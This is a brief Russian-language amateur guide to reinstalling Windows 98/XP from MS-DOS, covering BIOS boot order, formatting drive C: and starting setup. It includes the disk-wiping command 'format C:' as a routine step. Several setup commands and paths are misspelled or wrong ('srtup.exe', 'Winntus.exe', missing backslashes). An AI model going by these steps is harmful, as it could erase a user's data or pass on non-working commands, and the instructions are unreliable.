Переустановка Windows Для установки используйте только каачественный дестрибутив, не берите диск у друзей, лучше свой, на случий переустановки. Я рекомендую использовать диски, у которых в загрузке есть дополнительные программы. Если у Вас были серьёзные проблемы с работой операционной системы, то лучше её не переустанавливать, а использовать "новую установку" (во время работы в реестре системы накапливаются ошибки. При обновлении системы ошибки сохраняются.) Устанавливать Windows необходимо из MS DOS: при установке из Windows правильно сконфигурировать систему практичкски невозможно. Для новой установки: Перезагрузите компьютер в MS DOS (лучше с загрузочного диска - для этого в BIOS в моём в Advanced BIOS Features> Fist Boot Device выберите CDROM Если загрузочного диска нет или CDROM не поддерживает загрузку с CD, то подойдёт и загрузочная дискета. Отформатируйте диск, содержащий папку Windows, команда format C: где С-имя диска. (при установке Windows98 вместо XP помните, что Windows98 не поддерживает NTFS, значит форматирования не избежать (преобразовывать не советую) в остальных случаях может быть достаточно стереть папку Windows, и фаилы уонфигуруции (см. советы) Для запуска установки введите F:setup.exe и нажмите Enter F- имя дисковвода CD дисков, или полный путь к программе установки на жёстком диске. Если программа установки при загрузке с дискеты не будет запускаться перейдите на диск "A" и введите "HELP" при помощи имеющегося там редактора найдите и откройте файл SETUP.EXE (установка Windows), выйдите из редактора и перейдите на диск с дистрибутивом Windows и допишите к возникшему пути srtup.exe и нажмите Enter. При установке Windows 2000,XP,... -пропишите путь к дестрибутиву, и введите winntsetup.exe Например C:WinXPI386>Winntus.exe Легче запускать установку из графической оболочки, такой, как Norton Comander. После проверки диска выберите папку для установки не C:WINDOWS, а какю-нибудь другую см.советы. и выполняйте указания на экране.